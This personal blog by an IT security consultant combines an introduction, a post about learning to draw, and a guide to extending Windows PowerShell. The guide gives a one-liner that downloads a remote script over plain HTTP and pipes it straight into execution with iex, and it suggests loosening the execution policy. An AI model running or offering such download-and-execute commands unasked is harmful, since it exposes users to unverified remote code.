Technically I’m still a computer science student and while I might not be very active at the university right now, this year I’m aiming for a lot of self improvement. Not really sure how much will be worth articles, but sometimes things just are easier understood when written down for others.

Games

Games have been my passion ever since. Tabletop RPGs, Board Games, Poker, LARP (Live Action Roleplay), Computer Games (esp. shooter & MMOs).

How could I not write on occasion about them?

Other Stuff

I’m sure I have forgotten some things, but this is my personal blog, so expect some random stuff as well 😉

Quick Introduction

So who am I?

In a nutshell: I’m an IT security consultant, have an 11-month-old daughter, have been married for 4 years now but together with my wife for 16 years. I love games, science and metal, and enjoy sports and, generally speaking, challenges.

And that’s it for now, I’ll eventually put a proper about me section onto the page.

Learning to Draw

So, I decided to learn how to draw.  How did that happen?

I recently updated my amazon wishlist for a friend who wanted some ideas for my birthday. Among a few other things I realized that Betty Edwards’ “Drawing on the right side of the brain” was still on there.

A few years back I put it on there because it was repeatedly referenced in Andy Hunt’s “Refactor Your Wetware. Pragmatic Thinking and Learning” and I was intrigued by the neuro-psychological approach.

It is targeted to people who believe they can not draw and never will be able to. That pretty much is me. I kept it on the list and promised myself, if I get it, I will learn to draw.

Well, I got it. Here I am, learning to draw.

Motivation

Expression

There are a few reasons why I actually want to learn how to draw but certainly the most important is that I want to be able to express my thoughts. In my life there have been several moments where I was not able to express my ideas in an easy to understand way where a short sketch would have made all the difference. If I knew how to draw one.

Want a recent example? Okay, I’ll embarrass myself.

ShirtSketch

This is a sketch on my whiteboard where I tried to explain to my wife a design for a new top she should create. She knows me quite well, so she got what I had in mind, but it took time.

It is meant to be a tight fitting shirt / blouse with a transparent cutout in feather / wings optics and a repetition of the theme on the sleeves. You can get the concept from the sketch but in my mind it looks quite different.

Creative outlet

While I was never good at drawing, I always had creative outlets in my life. From (artistic) circus shows to storytelling in role-play games over cooking to writing and of course coding.

I am not in shape for artistic shows anymore (something I eventually want to change again). Being burned out a little on writing, coding and role-playing, I want to give drawing a chance. Do I want to become an artist? No, I will leave that to talents like Harlequin. But it might be something for every now and then, when the other ways to express my creativity don’t work.

Where do I go from here?

I just finished drawing the first three ‘images’. They are part of the pre-course preparations to be able to compare them to the results after reading and working through the book. I won’t publish them now but most likely once I’m done to show the before – after comparison.

I won’t be reading or drawing every day and more importantly I probably won’t post about it that often. Only important milestones or when I feel like writing 😉

Windows Commandline Tools

Since I usually do most of my development on my Linux laptop, a decent command-line interface is something I want on Windows as well. Most of this setup is inspired by this Totally Tooling Tip.

The windows powershell on its own is quite powerful already but can be enhanced quite a bit.

Setting powershell up

Most enhancements to powershell come as modules. With PSGet they can be managed easily. But to be able to run modules, the execution policy has to be set to allow external modules.

Set-ExecutionPolicy RemoteSigned

After that the command from PSGet installs the module manager.

(new-object Net.WebClient).DownloadString("http://psget.net/GetPsGet.ps1") | iex

Microsoft has a Knowledge Base article about the execution policy.

Git integration

posh-git provides command-line integration for my favorite version control system and can be installed with:

Install-Module posh-git

Now powershell provides tab completion for git and a custom prompt once in a folder with a git repository.

SSH

My servers usually run on Unix as well, so I have to connect to them via SSH. In the past I used PuTTY on Windows, but it has grown a bit old.

While Microsoft is planning SSH support for Powershell in the future, I wanted it now, and there is a module for that too: POSH-SSH

Again it is installed with a one liner that you copy from their page.

The module’s author has written a nice article about how to use it.

Cmder

A really nice collection of powershell modules and skins, plus a way to have tabs, split the window into multiple consoles and so on, is cmder. The drawback is that their modules are not signed and you have to lower the execution policy even further.
